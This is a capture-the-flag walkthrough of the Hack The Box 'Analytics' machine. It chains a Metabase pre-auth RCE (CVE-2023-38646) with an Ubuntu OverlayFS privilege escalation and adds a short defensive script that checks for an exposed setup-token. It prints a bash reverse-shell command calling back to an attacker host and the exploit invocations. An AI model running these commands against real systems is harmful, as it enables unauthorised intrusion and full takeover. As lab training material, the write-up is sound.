In this post, I will walk through the Analytics machine on Hack The Box.
Information gathering
First of all, an nmap scan of the machine shows that two ports are open: 22 and 80.
So, let's check the web page first.
Before checking the web page, you need to add the domain to the /etc/hosts file.
echo "10.10.11.233 analytics.htb" | sudo tee -a /etc/hosts
If you take a look at the web page, you will notice there is a login button on the menu bar.
However, when it is clicked, the page is not displayed and an error is returned instead.
If you look at the address bar carefully, you will notice it shows data.analytics.htb.
So, let's add this subdomain to the /etc/hosts file as well.
echo "10.10.11.233 data.analytics.htb" | sudo tee -a /etc/hosts
After adding it to the hosts file, the login page is displayed without any problems, as shown below.
OK, we can see it is using the Metabase tool.
User flag
Even though I didn't know the version of the tool, I searched on Google to see whether any exploits had already been discovered.
Several search results came up, and I chose the first one at the top of the results.
https://github.com/m3m0o/metabase-pre-auth-rce-poc
This GitHub page provides a POC for CVE-2023-38646.
I installed it on the attack machine.
According to the explanation, we need the value of the setup-token for the attack.
You can obtain the setup-token from the /api/session/properties endpoint.
token:249fa03d-fd94-4d5b-b94f-b4ebf3df681f
Once you have the token's value, you can execute the POC with the command you want to run.
So, let's put the reverse shell command in the -c argument.
python3 main.py -u http://data.analytics.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c "/bin/bash -i >& /dev/tcp/10.10.14.6/8888 0>&1"
I used port 8888 for listening. You need to be listening on that port to receive the connection from the shell.
If you execute the command, you will get the reverse shell.
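As an added, defender-side example that is not part of the original walkthrough: a small Python audit that parses the JSON a Metabase instance returns from /api/session/properties and flags a leftover setup-token, which is the precondition the POC above relies on. The sample response body is constructed, the token in it is a placeholder, and the has-user-setup key is assumed to be present in real responses.

```python
import json
import re

# Constructed sample of a /api/session/properties response body; a real reply
# carries many more keys, and the token below is a placeholder, not a real one.
SAMPLE_PROPERTIES = json.dumps({
    "version": {"tag": "v0.0.0-example"},
    "setup-token": "11111111-2222-4333-8444-555555555555",
    "has-user-setup": True,  # assumed key name, meaning initial setup is done
})

UUID_RE = re.compile(r"^[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}$")


def audit_session_properties(body: str) -> dict:
    """Return findings for one /api/session/properties response body.

    An instance that has finished setup should not publish a setup-token to
    unauthenticated callers; its presence is what the CVE-2023-38646
    pre-auth chain starts from, so it is the thing to check on your own host.
    """
    props = json.loads(body)
    token = props.get("setup-token")
    version = (props.get("version") or {}).get("tag", "unknown")
    findings = []
    if token:
        findings.append("setup-token is exposed to unauthenticated clients")
        if not UUID_RE.match(str(token)):
            findings.append("setup-token does not look like the expected UUID")
        if props.get("has-user-setup"):
            findings.append("setup already completed but setup-token still present")
    return {
        "version": version,
        "setup_token_exposed": bool(token),
        "findings": findings,
    }


if __name__ == "__main__":
    print(json.dumps(audit_session_properties(SAMPLE_PROPERTIES), indent=2))
```

Point it at the body of a GET to your own instance's /api/session/properties; a clean result is an empty findings list, and anything else means the token must be removed and the instance patched.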
Cool, now let's look for credentials.
Before we do that, let's make the shell interactive with the following command.
/bin/sh -i
Finding the credentials took me a lot of time.
My first thought was to find them in the db file in the metabase directory, but I couldn't find any useful information there.
So I enumerated all the directories and files carefully. Then I found something interesting in /proc/environ.
There are the username and the password!
Let's use these credentials to SSH in!
OK, I managed to log in as metalytics.
After logging in, I found the user flag in the home directory.
Root flag
Since we have the user flag, the next target is the root flag.
To get it, we need to escalate privileges to root.
I started enumerating the directories and files again, but I couldn't find any interesting information even though I spent quite some time on it.
Instead of searching the files for credentials, I decided to check the version of the environment.
I checked the OS version.
cat /etc/os-release
The OS was Ubuntu 22.04.
I searched for exploits on Google and came across the POC below.
https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629
It covers CVE-2023-2640 and CVE-2023-32629.
According to the explanation, you get root privileges just by executing the file.
Therefore, I downloaded it on my attack machine and then sent it to the target machine via scp.
scp exploit.sh metalytics@10.10.11.233:/tmp/exploit.sh
To execute the file, you need to make it executable first.
If you run the file, you will be root.
You can find the flag in the root directory. That is the end of this machine!